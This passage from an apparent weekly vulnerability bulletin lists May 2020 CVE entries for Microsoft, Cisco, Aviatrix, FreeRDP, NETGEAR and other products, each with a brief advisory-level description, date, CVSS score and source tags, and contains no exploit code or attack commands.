A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft Office SharePoint XSS Vulnerability'. This CVE ID is unique from CVE-2020-1100, CVE-2020-1101, CVE-2020-1106. 2020-05-21 3.5 CVE-2020-1099
MISC netgear -- multiple_products
  An issue was discovered on NETGEAR Orbi Tri-Band Business WiFi Add-on Satellite (SRS60) AC3000 V2.5.1.106, Outdoor Satellite (RBS50Y) V2.5.1.106, and Pro Tri-Band Business WiFi Router (SRR60) AC3000 V2.5.1.106. The administrative SOAP interface allows an unauthenticated remote leak of sensitive/arbitrary Wi-Fi information, such as SSIDs and Pre-Shared-Keys (PSK). 2020-05-18 3.3 CVE-2020-11550
MISC
MISC
MISC pulseaudio -- pulseaudio
  An Ubuntu-specific modification to Pulseaudio to provide security mediation for Snap-packaged applications was found to have a bypass of intended access restriction for snaps which plugs any of pulseaudio, audio-playback or audio-record via unloading the pulseaudio snap policy module. This issue affects: pulseaudio 1:8.0 versions prior to 1:8.0-0ubuntu3.12; 1:11.1 versions prior to 1:11.1-1ubuntu7.7; 1:13.0 versions prior to 1:13.0-1ubuntu1.2; 1:13.99.1 versions prior to 1:13.99.1-1ubuntu3.2; 2020-05-15 2.1 CVE-2020-11931
MISC
UBUNTU rconfig -- rconfig
  rConfig 3.9.4 is vulnerable to reflected XSS. The configDevice.php file improperly validates user input. An attacker can exploit this vulnerability by crafting arbitrary JavaScript in the rid GET parameter of devicemgmnt.php. 2020-05-18 3.5 CVE-2020-12259
MISC rconfig -- rconfig
  rConfig 3.9.4 is vulnerable to reflected XSS. The devicemgmnt.php file improperly validates user input. An attacker can exploit this by crafting arbitrary JavaScript in the deviceId GET parameter to devicemgmnt.php. 2020-05-18 3.5 CVE-2020-12256
MISC submitty -- submitty
  Submitty through 20.04.01 allows XSS via upload of an SVG document, as demonstrated by an attack by a Student against a Teaching Fellow. 2020-05-15 3.5 CVE-2020-12882
MISC
MISC yaws -- yaws
  yaws_config.erl in Yaws through 2.0.2 and/or 2.0.7 loads obsolete TLS ciphers, as demonstrated by ones that allow Sweet32 attacks. 2020-05-15 2.1 CVE-2020-12872
MISC
MISC
MISC
MISC Back to top

 

Severity Not Yet Assigned Primary
Vendor -- Product Description Published CVSS Score Source & Patch Info anchorfree -- vpn_sdk An issue was discovered in AnchorFree VPN SDK before 1.3.3.218. The VPN SDK service takes certain executable locations over a socket bound to localhost. Binding to the socket and providing a path where a malicious executable file resides leads to executing the malicious executable file with SYSTEM privileges. 2020-05-21 not yet calculated CVE-2020-12828
MISC apache -- kylin
  Kylin has some restful apis which will concatenate os command with the user input string, a user is likely to be able to execute any os command without any protection or validation. 2020-05-22 not yet calculated CVE-2020-1956
MISC aviatrix -- controller An issue was discovered in Aviatrix Controller before 5.4.1204. It contains credentials unused by the software. 2020-05-22 not yet calculated CVE-2020-13414
MISC aviatrix -- controller
  An issue was discovered in Aviatrix Controller before 5.4.1204. An API call on the web interface lacked a session token check to control access, leading to CSRF. 2020-05-22 not yet calculated CVE-2020-13412
MISC aviatrix -- controller
  An issue was discovered in Aviatrix Controller before 5.4.1066. A Controller Web Interface session token parameter is not required on an API call, which opens the application up to a Cross Site Request Forgery (CSRF) vulnerability for password resets. 2020-05-22 not yet calculated CVE-2020-13416
MISC aviatrix -- controller
  An issue was discovered in Aviatrix Controller through 5.1. An attacker with any signed SAML assertion from the Identity Provider can establish a connection (even if that SAML assertion has expired or is from a user who is not authorized to access Aviatrix), aka XML Signature Wrapping. 2020-05-22 not yet calculated CVE-2020-13415
MISC aviatrix -- controller
  An issue was discovered in Aviatrix Controller before 5.4.1204. There is a Observable Response Discrepancy from the API, which makes it easier to perform user enumeration via brute force. 2020-05-22 not yet calculated CVE-2020-13413
MISC aviatrix -- vpn_client
  An Elevation of Privilege issue was discovered in Aviatrix VPN Client before 2.10.7, because of an incomplete fix for CVE-2020-7224. This affects Linux, macOS, and Windows installations for certain OpenSSL parameters. 2020-05-22 not yet calculated CVE-2020-13417
MISC

cisco -- amp_for_endpoints_linux_connector_software_and_amp_for_endpoints_mac_connector_software

A vulnerability in Cisco AMP for Endpoints Linux Connector Software and Cisco AMP for Endpoints Mac Connector Software could allow an authenticated, local attacker to cause a buffer overflow on an affected device. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending a crafted packet to an affected device. A successful exploit could allow the attacker to cause the Cisco AMP for Endpoints service to crash and restart. 2020-05-22 not yet calculated CVE-2020-3343
CISCO

cisco -- amp_for_endpoints_linux_connector_software_and_amp_for_endpoints_mac_connector_software

A vulnerability in Cisco AMP for Endpoints Linux Connector Software and Cisco AMP for Endpoints Mac Connector Software could allow an authenticated, local attacker to cause a buffer overflow on an affected device. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending a crafted packet to an affected device. A successful exploit could allow the attacker to cause the Cisco AMP for Endpoints service to crash and restart. 2020-05-22 not yet calculated CVE-2020-3344
CISCO

cisco -- amp_for_endpoints_mac_connector_software

A vulnerability in the file scan process of Cisco AMP for Endpoints Mac Connector Software could cause the scan engine to crash during the scan of local files, resulting in a restart of the AMP Connector and a denial of service (DoS) condition of the Cisco AMP for Endpoints service. The vulnerability is due to insufficient input validation of specific file attributes. An attacker could exploit this vulnerability by providing a crafted file to a user of an affected system. A successful exploit could allow the attacker to cause the Cisco AMP for Endpoints service to crash, resulting in missed detection and logging of the potentially malicious file. Continued attempts to scan the file could result in a DoS condition of the Cisco AMP for Endpoints service. 2020-05-22 not yet calculated CVE-2020-3314
CISCO cisco -- prime_collaboration_provisioning_software
  A vulnerability in the web-based management interface of Cisco Prime Collaboration Provisioning Software could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system. The vulnerability exists because the web-based management interface improperly validates user input for specific SQL queries. An attacker could exploit this vulnerability by authenticating to the application with valid administrative credentials and sending malicious requests to an affected system. A successful exploit could allow the attacker to view information that they are not authorized to view, make changes to the system that they are not authorized to make, or delete information from the database that they are not authorized to delete. 2020-05-22 not yet calculated CVE-2020-3184
CISCO cisco -- prime_nentwork_registrar
  A vulnerability in the DHCP server of Cisco Prime Network Registrar could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to insufficient input validation of incoming DHCP traffic. An attacker could exploit this vulnerability by sending a crafted DHCP request to an affected device. A successful exploit could allow the attacker to cause a restart of the DHCP server process, causing a DoS condition. 2020-05-22 not yet calculated CVE-2020-3272
CISCO cisco -- unified_contact_center_express
  A vulnerability in the Java Remote Management Interface of Cisco Unified Contact Center Express (Unified CCX) could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. The vulnerability is due to insecure deserialization of user-supplied content by the affected software. An attacker could exploit this vulnerability by sending a malicious serialized Java object to a specific listener on an affected system. A successful exploit could allow the attacker to execute arbitrary code as the root user on an affected device. 2020-05-22 not yet calculated CVE-2020-3280
CISCO epson -- eb-1470ui_main_devices
  An exploitable authentication bypass vulnerability exists in the ESPON Web Control functionality of Epson EB-1470Ui MAIN: 98009273ESWWV107 MAIN2: 8X7325WWV303. A specially crafted series of HTTP requests can cause authentication bypass resulting in information disclosure. An attacker can send an HTTP request to trigger this vulnerability. 2020-05-22 not yet calculated CVE-2020-6091
MISC

freerdp -- freerdp

An issue was discovered in FreeRDP before 2.1.1. An out-of-bounds (OOB) read vulnerability has been detected in security_fips_decrypt in libfreerdp/core/security.c due to an uninitialized value. 2020-05-22 not yet calculated CVE-2020-13397
MISC
MISC
MISC freerdp -- freerdp
  An issue was discovered in FreeRDP before 2.1.1. An out-of-bounds (OOB) write vulnerability has been detected in crypto_rsa_common in libfreerdp/crypto/crypto.c. 2020-05-22 not yet calculated CVE-2020-13398
MISC
MISC
MISC freerdp -- freerdp
  An issue was discovered in FreeRDP before 2.1.1. An out-of-bounds (OOB) read vulnerability has been detected in ntlm_read_ChallengeMessage in winpr/libwinpr/sspi/NTLM/ntlm_message.c. 2020-05-22 not yet calculated CVE-2020-13396
MISC
MISC
MISC icrosoft -- multiple_sharepoint_products A spoofing vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft SharePoint Spoofing Vulnerability'. This CVE ID is unique from CVE-2020-1104, CVE-2020-1105. 2020-05-21 not yet calculated CVE-2020-1107
MISC icrosoft -- multiple_sharepoint_products
  A spoofing vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft SharePoint Spoofing Vulnerability'. This CVE ID is unique from CVE-2020-1105, CVE-2020-1107. 2020-05-21 not yet calculated CVE-2020-1104
MISC jenzabar -- internet_campus_solution
  Jenzabar JICS (aka Internet Campus Solution) before 9.0.1 Patch 3, 9.1 before 9.1.2 Patch 2, and 9.2 before 9.2.2 Patch 8 has session cookies that are a deterministic function of the username. There is a hard-coded password to supply a PBKDF feeding into AES to encrypt a username and base64 encode it to a client-side cookie for persistent session authentication. By knowing the key and algorithm, an attacker can select any username, encrypt it, base64 encode it, and save it in their browser with the correct JICSLoginCookie cookie format to impersonate any real user in the JICS database without the need for authenticating (or verifying with MFA if implemented). 2020-05-19 not yet calculated CVE-2020-8434
MISC johnson_controls -- software_house_c•cure_9000
  During installation or upgrade to Software House C•CURE 9000 v2.70 and American Dynamics victor Video Management System v5.2, the credentials of the user used to perform the installation or upgrade are logged in a file. The install log file persists after the installation. 2020-05-21 not yet calculated CVE-2020-9045
CONFIRM
CERT joomla! -- joomla! The XCloner component before 3.5.4 for Joomla! allows Authenticated Local File Disclosure. 2020-05-23 not yet calculated CVE-2020-13424
MISC kaoni -- ezhttptrans
  Ezhttptrans.ocx ActiveX Control in Kaoni ezHTTPTrans 1.0.0.70 and prior versions contain a vulnerability that could allow remote attacker to download and execute arbitrary file by setting the arguments to the activex method. This can be leveraged for code execution. 2020-05-22 not yet calculated CVE-2020-7813
MISC
MISC linux -- linux_kernel
  A NULL pointer dereference flaw was found in the Linux kernel's SELinux subsystem in versions before 5.7. This flaw occurs while importing the Commercial IP Security Option (CIPSO) protocol's category bitmap into the SELinux extensible bitmap via the' ebitmap_netlbl_import' routine. While processing the CIPSO restricted bitmap tag in the 'cipso_v4_parsetag_rbm' routine, it sets the security attribute to indicate that the category bitmap is present, even if it has not been allocated. This issue leads to a NULL pointer dereference issue while importing the same category bitmap into SELinux. This flaw allows a remote network user to crash the system kernel, resulting in a denial of service. 2020-05-22 not yet calculated CVE-2020-10711
CONFIRM
CONFIRM meinheld -- meinheld meinheld prior to 1.0.2 is vulnerable to HTTP Request Smuggling. HTTP pipelining issues and request smuggling attacks might be possible due to incorrect Content-Length and Transfer encoding header parsing. 2020-05-22 not yet calculated CVE-2020-7658
MISC
MISC microsoft -- .net_framework
  An elevation of privilege vulnerability exists in .NET Framework which could allow an attacker to elevate their privilege level.To exploit the vulnerability, an attacker would first have to access the local machine, and then run a malicious program.The update addresses the vulnerability by correcting how .NET Framework activates COM objects., aka '.NET Framework Elevation of Privilege Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1066
MISC microsoft -- asp.net_core_and_visual_studio_2017_and_2019
  A denial of service vulnerability exists when ASP.NET Core improperly handles web requests, aka 'ASP.NET Core Denial of Service Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1161
MISC microsoft -- chakracore_and_edge_(html-based) A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1065
MISC microsoft -- chakracore_and_edge_(html-based) A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge (HTML-based), aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1037
MISC microsoft -- dynamics_365_(on-premises)
  A cross site scripting vulnerability exists when Microsoft Dynamics 365 (on-premises) does not properly sanitize a specially crafted web request to an affected Dynamics server, aka 'Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1063
MISC microsoft -- edge_(chromium-based) An elevation of privilege vulnerability exists in Microsoft Edge (Chromium-based) when the Feedback extension improperly validates input, aka 'Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1195
MISC microsoft -- edge_(html-based) A spoofing vulnerability exists when Microsoft Edge does not properly parse HTTP content, aka 'Microsoft Edge Spoofing Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1059
MISC microsoft -- edge_(html-based)
  A remote code execution vulnerability exists when Microsoft Edge PDF Reader improperly handles objects in memory, aka 'Microsoft Edge PDF Remote Code Execution Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1096
MISC microsoft -- edge_(html-based)
  An elevation of privilege vulnerability exists when Microsoft Edge does not properly enforce cross-domain policies, which could allow an attacker to access information from one domain and inject it into another domain.In a web-based attack scenario, an attacker could host a website that is used to attempt to exploit the vulnerability, aka 'Microsoft Edge Elevation of Privilege Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1056
MISC microsoft -- internet_explorer_9_and_11 A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory, aka 'VBScript Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1035, CVE-2020-1058, CVE-2020-1060. 2020-05-21 not yet calculated CVE-2020-1093
MISC microsoft -- internet_explorer_9_and_11
  A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory, aka 'Internet Explorer Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1062. 2020-05-21 not yet calculated CVE-2020-1092
MISC microsoft -- internet_explorer_9_and_11
  A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory, aka 'VBScript Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1035, CVE-2020-1060, CVE-2020-1093. 2020-05-21 not yet calculated CVE-2020-1058
MISC microsoft -- internet_explorer_9_and_11
  A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory, aka 'VBScript Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1058, CVE-2020-1060, CVE-2020-1093. 2020-05-21 not yet calculated CVE-2020-1035
MISC microsoft -- internet_explorer_9_and_11
  A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory, aka 'VBScript Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1035, CVE-2020-1058, CVE-2020-1093. 2020-05-21 not yet calculated CVE-2020-1060
MISC microsoft -- internet_explorer_9_and_11
  A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory, aka 'Internet Explorer Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1092. 2020-05-21 not yet calculated CVE-2020-1062
MISC microsoft -- internet_explorer_9_and_11
  A remote code execution vulnerability exists in the way that the MSHTML engine improperly validates input.An attacker could execute arbitrary code in the context of the current user, aka 'MSHTML Engine Remote Code Execution Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1064
MISC microsoft -- multiple_products A denial of service vulnerability exists when .NET Core or .NET Framework improperly handles web requests, aka '.NET Core & .NET Framework Denial of Service Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1108
MISC microsoft -- multiple_sharepoint_products
  A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1024, CVE-2020-1102. 2020-05-21 not yet calculated CVE-2020-1023
MISC microsoft -- multiple_sharepoint_products
  A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1023, CVE-2020-1102. 2020-05-21 not yet calculated CVE-2020-1024
MISC microsoft -- multiple_sharepoint_products
  An information disclosure vulnerability exists where certain modes of the search function in Microsoft SharePoint Server are vulnerable to cross-site search attacks (a variant of cross-site request forgery, CSRF).When users are simultaneously logged in to Microsoft SharePoint Server and visit a malicious web page, the attacker can, through standard browser functionality, induce the browser to invoke search queries as the logged in user, aka 'Microsoft SharePoint Information Disclosure Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1103
MISC microsoft -- multiple_sharepoint_products
  A remote code execution vulnerability exists in Microsoft SharePoint Server when it fails to properly identify and filter unsafe ASP.Net web controls, aka 'Microsoft SharePoint Server Remote Code Execution Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1069
MISC microsoft -- multiple_windows_products A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory, aka 'Media Foundation Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1028, CVE-2020-1126, CVE-2020-1150. 2020-05-21 not yet calculated CVE-2020-1136
MISC microsoft -- multiple_windows_products An elevation of privilege vulnerability exists when the Windows Printer Service improperly validates file paths while loading printer drivers, aka 'Windows Printer Service Elevation of Privilege Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1081
MISC microsoft -- multiple_windows_products An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1114. 2020-05-21 not yet calculated CVE-2020-1087
MISC microsoft -- multiple_windows_products A remote code execution vulnerability exists in the way that Windows handles objects in memory, aka 'Windows Remote Code Execution Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1067
MISC microsoft -- multiple_windows_products A remote code execution vulnerability exists in the way that the Microsoft Script Runtime handles objects in memory, aka 'Microsoft Script Runtime Remote Code Execution Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1061
MISC microsoft -- multiple_windows_products An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations.To exploit the vulnerability, an attacker would require unprivileged execution on the victim system, aka 'Windows Installer Elevation of Privilege Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1078
MISC microsoft -- multiple_windows_products A denial of service vulnerability exists when Windows improperly handles objects in memory, aka 'Windows Denial of Service Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1076
MISC microsoft -- multiple_windows_products An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files, aka 'Windows Error Reporting Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1021, CVE-2020-1082. 2020-05-21 not yet calculated CVE-2020-1088
MISC microsoft -- multiple_windows_products An elevation of privilege vulnerability exists when Windows improperly handles calls to Clipboard Service, aka 'Windows Clipboard Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1111, CVE-2020-1165, CVE-2020-1166. 2020-05-21 not yet calculated CVE-2020-1121
MISC microsoft -- multiple_windows_products An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1077, CVE-2020-1086, CVE-2020-1090, CVE-2020-1125, CVE-2020-1139, CVE-2020-1149, CVE-2020-1151, CVE-2020-1155, CVE-2020-1156, CVE-2020-1157, CVE-2020-1164. 2020-05-21 not yet calculated CVE-2020-1158
MISC microsoft -- multiple_windows_products An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles file and folder links, aka 'Windows Error Reporting Manager Elevation of Privilege Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1132
MISC microsoft -- multiple_windows_products A remote code execution vulnerability exists in the way that the Color Management Module (ICM32.dll) handles objects in memory, aka 'Microsoft Color Management Remote Code Execution Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1117
MISC microsoft -- multiple_windows_products An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory, aka 'Windows GDI Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-0963, CVE-2020-1141, CVE-2020-1145. 2020-05-21 not yet calculated CVE-2020-1179
MISC microsoft -- multiple_windows_products An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system, aka 'Windows GDI Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-0963, CVE-2020-1145, CVE-2020-1179. 2020-05-21 not yet calculated CVE-2020-1141
MISC microsoft -- multiple_windows_products An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory, aka 'DirectX Elevation of Privilege Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1140
MISC microsoft -- multiple_windows_products An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory, aka 'Windows Graphics Component Elevation of Privilege Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1135
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1077, CVE-2020-1086, CVE-2020-1090, CVE-2020-1139, CVE-2020-1149, CVE-2020-1151, CVE-2020-1155, CVE-2020-1156, CVE-2020-1157, CVE-2020-1158, CVE-2020-1164. 2020-05-21 not yet calculated CVE-2020-1125
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1077, CVE-2020-1086, CVE-2020-1090, CVE-2020-1125, CVE-2020-1149, CVE-2020-1151, CVE-2020-1155, CVE-2020-1156, CVE-2020-1157, CVE-2020-1158, CVE-2020-1164. 2020-05-21 not yet calculated CVE-2020-1139
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Storage Service improperly handles file operations, aka 'Windows Storage Service Elevation of Privilege Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1138
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists in the way the Windows Push Notification Service handles objects in memory, aka 'Windows Push Notification Service Elevation of Privilege Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1137
MISC microsoft -- multiple_windows_products
  An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory, aka 'Windows GDI Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-1141, CVE-2020-1145, CVE-2020-1179. 2020-05-21 not yet calculated CVE-2020-0963
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1124, CVE-2020-1131, CVE-2020-1144, CVE-2020-1184, CVE-2020-1185, CVE-2020-1186, CVE-2020-1187, CVE-2020-1188, CVE-2020-1189, CVE-2020-1190, CVE-2020-1191. 2020-05-21 not yet calculated CVE-2020-1134
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1077, CVE-2020-1086, CVE-2020-1090, CVE-2020-1125, CVE-2020-1139, CVE-2020-1151, CVE-2020-1155, CVE-2020-1156, CVE-2020-1157, CVE-2020-1158, CVE-2020-1164. 2020-05-21 not yet calculated CVE-2020-1149
MISC microsoft -- multiple_windows_products
  A security feature bypass vulnerability exists in Microsoft Windows when the Task Scheduler service fails to properly verify client connections over RPC, aka 'Windows Task Scheduler Security Feature Bypass Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1113
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1124, CVE-2020-1134, CVE-2020-1144, CVE-2020-1184, CVE-2020-1185, CVE-2020-1186, CVE-2020-1187, CVE-2020-1188, CVE-2020-1189, CVE-2020-1190, CVE-2020-1191. 2020-05-21 not yet calculated CVE-2020-1131
MISC microsoft -- multiple_windows_products
  A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory, aka 'Media Foundation Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1028, CVE-2020-1136, CVE-2020-1150. 2020-05-21 not yet calculated CVE-2020-1126
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory, aka 'Windows Common Log File System Driver Elevation of Privilege Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1154
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1131, CVE-2020-1134, CVE-2020-1144, CVE-2020-1184, CVE-2020-1185, CVE-2020-1186, CVE-2020-1187, CVE-2020-1188, CVE-2020-1189, CVE-2020-1190, CVE-2020-1191. 2020-05-21 not yet calculated CVE-2020-1124
MISC microsoft -- multiple_windows_products
  A denial of service vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations, aka 'Connected User Experiences and Telemetry Service Denial of Service Vulnerability'. This CVE ID is unique from CVE-2020-1084. 2020-05-21 not yet calculated CVE-2020-1123
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1087. 2020-05-21 not yet calculated CVE-2020-1114
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1054. 2020-05-21 not yet calculated CVE-2020-1143
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1077, CVE-2020-1086, CVE-2020-1090, CVE-2020-1125, CVE-2020-1139, CVE-2020-1149, CVE-2020-1155, CVE-2020-1156, CVE-2020-1157, CVE-2020-1158, CVE-2020-1164. 2020-05-21 not yet calculated CVE-2020-1151
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1077, CVE-2020-1086, CVE-2020-1090, CVE-2020-1125, CVE-2020-1139, CVE-2020-1149, CVE-2020-1151, CVE-2020-1155, CVE-2020-1157, CVE-2020-1158, CVE-2020-1164. 2020-05-21 not yet calculated CVE-2020-1156
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Update Stack fails to properly handle objects in memory, aka 'Windows Update Stack Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1109. 2020-05-21 not yet calculated CVE-2020-1110
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1077, CVE-2020-1086, CVE-2020-1090, CVE-2020-1125, CVE-2020-1139, CVE-2020-1149, CVE-2020-1151, CVE-2020-1156, CVE-2020-1157, CVE-2020-1158, CVE-2020-1164. 2020-05-21 not yet calculated CVE-2020-1155
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1077, CVE-2020-1086, CVE-2020-1090, CVE-2020-1125, CVE-2020-1139, CVE-2020-1149, CVE-2020-1151, CVE-2020-1155, CVE-2020-1156, CVE-2020-1158, CVE-2020-1164. 2020-05-21 not yet calculated CVE-2020-1157
MISC microsoft -- multiple_windows_products
  A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory, aka 'Microsoft Graphics Components Remote Code Execution Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1153
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when Windows improperly handles calls to Clipboard Service, aka 'Windows Clipboard Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1121, CVE-2020-1165, CVE-2020-1166. 2020-05-21 not yet calculated CVE-2020-1111
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1077, CVE-2020-1090, CVE-2020-1125, CVE-2020-1139, CVE-2020-1149, CVE-2020-1151, CVE-2020-1155, CVE-2020-1156, CVE-2020-1157, CVE-2020-1158, CVE-2020-1164. 2020-05-21 not yet calculated CVE-2020-1086
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, aka 'Windows GDI Elevation of Privilege Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1142
MISC microsoft -- multiple_windows_products
  An information disclosure vulnerability exists when Windows Subsystem for Linux improperly handles objects in memory, aka 'Windows Subsystem for Linux Information Disclosure Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1075
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1124, CVE-2020-1131, CVE-2020-1134, CVE-2020-1144, CVE-2020-1184, CVE-2020-1185, CVE-2020-1186, CVE-2020-1188, CVE-2020-1189, CVE-2020-1190, CVE-2020-1191. 2020-05-21 not yet calculated CVE-2020-1187
MISC microsoft -- multiple_windows_products
